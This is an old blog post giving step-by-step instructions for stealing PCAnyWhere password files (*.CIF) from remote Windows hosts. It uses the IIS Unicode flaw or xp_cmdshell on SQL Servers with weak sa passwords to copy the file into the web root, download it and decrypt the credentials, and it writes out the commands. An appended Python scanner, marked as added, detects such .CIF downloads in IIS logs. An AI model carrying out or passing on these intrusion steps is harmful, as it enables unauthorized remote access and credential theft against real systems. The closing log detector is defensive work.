Friday, 11 November 2011

How to crack the PCAnyWhere password

NT machines are generally managed remotely with PCAnyWhere, and Win2K machines generally use Terminal Services for remote management, so if you can obtain the PCAnyWhere remote-connection account and password, you can connect to the host remotely.
The key is to obtain the PCAnyWhere password file (*.CIF) and then use the PCanyWhere password viewer tool (http://www.csdn.net/soft/openfile.asp?kind=2&id=7824) to recover the account and password.

The PCAnyWhere server uses port 5631. You can use:

Telnet 10.10.10.10 5631

to determine whether the PCAnyWhere server on the remote host is running.

Here are two ways to obtain the PCAnyWhere password file:
Method 1: Unicode vulnerability + PCanyWhere password viewer tool

The following demonstrates how to use a Unicode tool to exploit the Unicode vulnerability and obtain the PCAnyWhere password file (*.CIF).

Tool download:

Pcanywhere9.2: http://www.symantec.com/

The downloaded Pcanywhere9.2 has a usage time limit.
The steps are as follows:

Find the *.CIF file on the host.
Copy the file to the website directory.
Download the file using IE.
Use PcanywherePWD to get the user name and password.
Connect and log in.
Detailed steps:

Find the *.CIF file on the host
Use the command dir c:\*.cif /s:

Citempl.cif is generally the system default password file, so the file we need is SA.CIF.

Copy the file to the website directory.
You need to know the website directory. It can be obtained through the ida and idq vulnerabilities, or you can pick an image file used by the site, such as Tscontent.gif, and search for that file with the command
dir c:\Tscontent.gif /s

Once the directory is known, for example c:\inetpub\wwwroot\

Password file directory: c:\Program Files\pcANYWHERE\DATA

Then run the Copy command:

The output "1 file(s) copied" means the copy succeeded.

Download the file using IE
The file can be downloaded from http://1.1.1.1/sa.cif.

Use the PCanyWhere password viewer tool to get the user name and password

Remote connection
Method 2: SQLServer + PCanyWhere password viewer tool

On some websites the SQLServer Sa password is blank, or is Sa, or may be the same as the domain name. If you can connect remotely to the database on the host, the password file can be obtained in the same way:

The method is as follows:

Use: XP_Cmdshell 'dir c:\*.cif /s'

Find the password file, then copy it to the website directory:

XP_Cmdshell 'copy c:\pcanywhere\sa.cif c:\inetpub\wwwroot'

Then download it to get the user name and password.
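Both methods end with a .CIF file being fetched over HTTP from the website directory, which leaves a record in the web server log. The following is an added example, not part of the original post, that flags such requests; it assumes IIS W3C extended logs with a #Fields header, the function name find_cif_requests is hypothetical, and the log lines are constructed.

```python
# Constructed sample in IIS W3C extended log format (not real traffic).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2011-11-11 03:14:07 192.0.2.50 GET /default.asp - 200
2011-11-11 03:15:42 192.0.2.50 GET /sa.cif - 200
2011-11-11 03:16:10 198.51.100.7 GET /images/Tscontent.gif - 200
2011-11-11 03:17:55 198.51.100.7 GET /backup/SA.CIF - 404
"""


def find_cif_requests(lines):
    """Return one dict per logged request whose URI stem ends in .cif."""
    fields, hits = [], []
    for raw in lines:
        line = raw.strip()
        if line.startswith("#Fields:"):
            # Column layout can change mid-file; always honour the latest header.
            fields = line[len("#Fields:"):].split()
            continue
        if not line or line.startswith("#") or not fields:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # truncated or malformed record
        rec = dict(zip(fields, parts))
        uri = rec.get("cs-uri-stem", "")
        if uri.lower().endswith(".cif"):
            status = rec.get("sc-status", "")
            hits.append({
                "when": f'{rec.get("date", "?")} {rec.get("time", "?")}',
                "client": rec.get("c-ip", "?"),
                "uri": uri,
                "status": status,
                # A 2xx answer means the password file was actually handed out.
                "served": status.startswith("2"),
            })
    return hits


if __name__ == "__main__":
    for hit in find_cif_requests(SAMPLE_LOG.splitlines()):
        level = "ALERT" if hit["served"] else "probe"
        print(f'{level}: {hit["client"]} {hit["uri"]} -> {hit["status"]} at {hit["when"]}')
```

A hit marked served means a .CIF file was reachable under the website directory, so the credentials stored in it should be changed and the file removed from that directory.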
